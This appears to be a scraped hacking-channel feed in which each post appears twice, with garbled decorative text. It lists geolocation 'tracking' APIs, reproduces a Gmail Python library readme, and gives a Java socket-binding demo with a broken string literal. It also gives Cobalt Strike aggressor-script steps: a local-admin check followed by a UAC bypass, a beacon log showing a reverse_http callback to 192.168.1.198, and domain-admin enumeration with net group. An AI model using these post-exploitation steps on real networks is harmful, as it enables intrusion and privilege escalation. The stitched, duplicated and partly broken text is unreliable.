UNDERCODE COMMUNITY
Photo
FOR HACK ANY GAME, use for offline games (legal)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦API FOR TRACKING
Currently, the following APIs are implemented:
-
-
-
-
-
-
-
-
-
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦API FOR TRACKING
Currently, the following APIs are implemented:
-
cellocation: [Cellocation.com API (China)](http://www.cellocation.com/interfac/)-
gpsspg: [GPSspg.com API (China)](http://www.gpsspg.com/api/bs/)-
google: [Google Geolocation API](https://developers.google.com/maps/documentation/geolocation/intro)-
haoservice: [HaoService.com API (China)](http://www.haoservice.com/docs/1)-
mozilla: [Mozilla Geolocation API](https://location.services.mozilla.com/api)-
mylnikov: [Mylnikov Geolocation API](https://www.mylnikov.org/archives/1059)-
opencellid: [OpenCellID API](http://opencellid.org/)-
unwiredlabs: [UnwiredLabs Location API](https://unwiredlabs.com/)-
yandex: [Yandex Geolocation API (Russian)](https://tech.yandex.ru/locator/doc/dg/api/geolocation-api_json-docpage/)@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google for Developers
Geolocation API overview | Google for Developers
Find location based on cell towers and WiFi nodes. Learn the protocol to send this data to the server and to return a response to the client.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A Pythonic interface to Google's GMail, with all the tools you'll need. Search, read and send multipart emails, archive, mark as read/unread, delete emails, and manage labels.
Search emails
Read emails
Emails: label, archive, delete, mark as read/unread/spam, star
Manage labels
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone git://github.com/charlierguo/gmail.git
2) To start, import the gmail library.
import gmail
Authenticating gmail sessions
To easily get up and running:
import gmail
g = gmail.login(username, password)
Which will automatically log you into a GMail account. This is actually a shortcut for creating a new Gmail object:
from gmail import Gmail
g = Gmail()
g.login(username, password)
# play with your gmail...
g.logout()
You can also check if you are logged in at any time:
g = gmail.login(username, password)
g.logged_in # Should be True, AuthenticationError if login fails
OAuth authentication
If you have already received an OAuth2 access token from Google for a given user, you can easily log the user in. (Because OAuth 1.0 usage was deprecated in April 2012, this library does not currently support its usage)
gmail = gmail.authenticate(username, access_token)
Filtering emails
Get all messages in your inbox:
g.inbox().mail()
Get messages that fit some criteria:
g.inbox().mail(after=datetime.date(2013, 6, 18), before=datetime.date(2013, 8, 3))
g.inbox().mail(on=datetime.date(2009, 1, 1)
g.inbox().mail(sender="myfriend@gmail.com") # "from" is reserved, use "fr" or "sender"
g.inbox().mail(to="directlytome@gmail.com")
Combine flags and options:
g.inbox().mail(unread=True, sender="myboss@gmail.com")
Browsing labeled emails is similar to working with your inbox.
g.mailbox('Urgent').mail()
Every message in a conversation/thread will come as a separate message.
g.inbox().mail(unread=True, before=datetime.date(2013, 8, 3) sender="myboss@gmail.com")
Working with emails
Important: calls to mail() will return a list of empty email messages (with unique IDs). To work with labels, headers, subjects, and bodies, call fetch() on an individual message. You can call mail with prefetch=True, which will fetch the bodies automatically.
unread = g.inbox().mail(unread=True)
print unread[0].body
# None
unread[0].fetch()
print unread[0].body
# Dear ...,
Mark news past a certain date as read and archive it:
emails = g.inbox().mail(before=datetime.date(2013, 4, 18), sender="news@nbcnews.com")
for email in emails:
email.read() # can also unread(), delete(), spam(), or star()
email.archive()
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A Pythonic interface to Google's GMail, with all the tools you'll need. Search, read and send multipart emails, archive, mark as read/unread, delete emails, and manage labels.
Search emails
Read emails
Emails: label, archive, delete, mark as read/unread/spam, star
Manage labels
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone git://github.com/charlierguo/gmail.git
2) To start, import the gmail library.
import gmail
Authenticating gmail sessions
To easily get up and running:
import gmail
g = gmail.login(username, password)
Which will automatically log you into a GMail account. This is actually a shortcut for creating a new Gmail object:
from gmail import Gmail
g = Gmail()
g.login(username, password)
# play with your gmail...
g.logout()
You can also check if you are logged in at any time:
g = gmail.login(username, password)
g.logged_in # Should be True, AuthenticationError if login fails
OAuth authentication
If you have already received an OAuth2 access token from Google for a given user, you can easily log the user in. (Because OAuth 1.0 usage was deprecated in April 2012, this library does not currently support its usage)
gmail = gmail.authenticate(username, access_token)
Filtering emails
Get all messages in your inbox:
g.inbox().mail()
Get messages that fit some criteria:
g.inbox().mail(after=datetime.date(2013, 6, 18), before=datetime.date(2013, 8, 3))
g.inbox().mail(on=datetime.date(2009, 1, 1)
g.inbox().mail(sender="myfriend@gmail.com") # "from" is reserved, use "fr" or "sender"
g.inbox().mail(to="directlytome@gmail.com")
Combine flags and options:
g.inbox().mail(unread=True, sender="myboss@gmail.com")
Browsing labeled emails is similar to working with your inbox.
g.mailbox('Urgent').mail()
Every message in a conversation/thread will come as a separate message.
g.inbox().mail(unread=True, before=datetime.date(2013, 8, 3) sender="myboss@gmail.com")
Working with emails
Important: calls to mail() will return a list of empty email messages (with unique IDs). To work with labels, headers, subjects, and bodies, call fetch() on an individual message. You can call mail with prefetch=True, which will fetch the bodies automatically.
unread = g.inbox().mail(unread=True)
print unread[0].body
# None
unread[0].fetch()
print unread[0].body
# Dear ...,
Mark news past a certain date as read and archive it:
emails = g.inbox().mail(before=datetime.date(2013, 4, 18), sender="news@nbcnews.com")
for email in emails:
email.read() # can also unread(), delete(), spam(), or star()
email.archive()
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦When the server needs to be turned on during development, the local test is to write the port directly, and the actual environment also needs to specify the IP to be bonded.
Because for the server, sometimes it has more than one network card, and our system must communicate through the specified IP and port, so the IP and port used by the server need to define a configuration file.
π¦So in the usual test, without specifying the IP, where is the ServerSocket bound?
In this case, the server will bind this port to 0.0.0.0, that is, bind on all IPs, that is, receive requests on each IP. As for what 0.0.0.0 is, I won't talk about it here.
π¦The following is a test program, you can see what is going on through the following program:
package test;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
public class Test {
public static void main(String[] args) throws Exception {
SocketClient client = new SocketClient();
new Thread(client).start();
ServerSocket serverSocket = new ServerSocket();
serverSocket.bind(new InetSocketAddress(8888));
// serverSocket.bind(new InetSocketAddress("127.0.0.1",8888));
// serverSocket.bind(new InetSocketAddress("192.168.1.100",8888));
System.out.println(serverSocket.toString());
serverSocket.accept();
}
}
class SocketClient implements Runnable{
public void run() {
try {
Thread.sleep(2000);
try {
Socket socket = new Socket("127.0.0.1", 8888);
System.out.println("127.0.0.1 " + socket.toString());
} catch (Exception e) {
System.err.println("127.0.0.1'');
}
try {
Socket socket = new Socket("192.168.1.100", 8888);
System.out.println("192.168.1.100 " + socket.toString());
} catch (Exception e) {
System.err.println("192.168.1.100");
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦When the server needs to be turned on during development, the local test is to write the port directly, and the actual environment also needs to specify the IP to be bonded.
Because for the server, sometimes it has more than one network card, and our system must communicate through the specified IP and port, so the IP and port used by the server need to define a configuration file.
π¦So in the usual test, without specifying the IP, where is the ServerSocket bound?
In this case, the server will bind this port to 0.0.0.0, that is, bind on all IPs, that is, receive requests on each IP. As for what 0.0.0.0 is, I won't talk about it here.
π¦The following is a test program, you can see what is going on through the following program:
package test;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
public class Test {
public static void main(String[] args) throws Exception {
SocketClient client = new SocketClient();
new Thread(client).start();
ServerSocket serverSocket = new ServerSocket();
serverSocket.bind(new InetSocketAddress(8888));
// serverSocket.bind(new InetSocketAddress("127.0.0.1",8888));
// serverSocket.bind(new InetSocketAddress("192.168.1.100",8888));
System.out.println(serverSocket.toString());
serverSocket.accept();
}
}
class SocketClient implements Runnable{
public void run() {
try {
Thread.sleep(2000);
try {
Socket socket = new Socket("127.0.0.1", 8888);
System.out.println("127.0.0.1 " + socket.toString());
} catch (Exception e) {
System.err.println("127.0.0.1'');
}
try {
Socket socket = new Socket("192.168.1.100", 8888);
System.out.println("192.168.1.100 " + socket.toString());
} catch (Exception e) {
System.err.println("192.168.1.100");
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CobaltStrike toolkit:
Currently uses a PowerShell based check, combined with an aggressor script to check for the initial agent user name. While using .NET 3.5 to perform Domain Group enumeration (PowerShell 2+ safe). This allows for alerting on Pen-Test of a DA level beacons.
Β» Places a note on the beacon
Logs to the Event Log for team to see PID
uses a Pop up to alert opperator
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) clone https://github.com/killswitch-GUI/CobaltStrike-ToolKit
2) Run this with all the other scripts :
aggressor> load Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
when a Initial Beacon comes in:
aggressor> reload Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
If it returns as a Local Admin it will perform Bypass UAC:
[*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.1.198:80) in a high integrity process
[+] host called home, sent: 76304 bytes
3) load up the script
aggressor> load DA-Watch.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/DA-Watch.cna
Run this command and it will populate the known DA list
shell net group /domain "Domain Admins"
uaddDA - Command
Adds a user to the DA list
uremDA - Command
Removes a user from the DA list
ulistDA - Command
Prints a list of the current DA's to the Console
uhookOn
Sets the hook to follow beacon output to "On". This will watch all output for Shell net group...
uhookOff
Turns off the watch hook and set the follow beacon output to off.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CobaltStrike toolkit:
Currently uses a PowerShell based check, combined with an aggressor script to check for the initial agent user name. While using .NET 3.5 to perform Domain Group enumeration (PowerShell 2+ safe). This allows for alerting on Pen-Test of a DA level beacons.
Β» Places a note on the beacon
Logs to the Event Log for team to see PID
uses a Pop up to alert opperator
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) clone https://github.com/killswitch-GUI/CobaltStrike-ToolKit
2) Run this with all the other scripts :
aggressor> load Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
when a Initial Beacon comes in:
aggressor> reload Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
If it returns as a Local Admin it will perform Bypass UAC:
[*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.1.198:80) in a high integrity process
[+] host called home, sent: 76304 bytes
3) load up the script
aggressor> load DA-Watch.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/DA-Watch.cna
Run this command and it will populate the known DA list
shell net group /domain "Domain Admins"
uaddDA - Command
Adds a user to the DA list
uremDA - Command
Removes a user from the DA list
ulistDA - Command
Prints a list of the current DA's to the Console
uhookOn
Sets the hook to follow beacon output to "On". This will watch all output for Shell net group...
uhookOff
Turns off the watch hook and set the follow beacon output to off.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - killswitch-GUI/CobaltStrike-ToolKit: Some useful scripts for CobaltStrike
Some useful scripts for CobaltStrike . Contribute to killswitch-GUI/CobaltStrike-ToolKit development by creating an account on GitHub.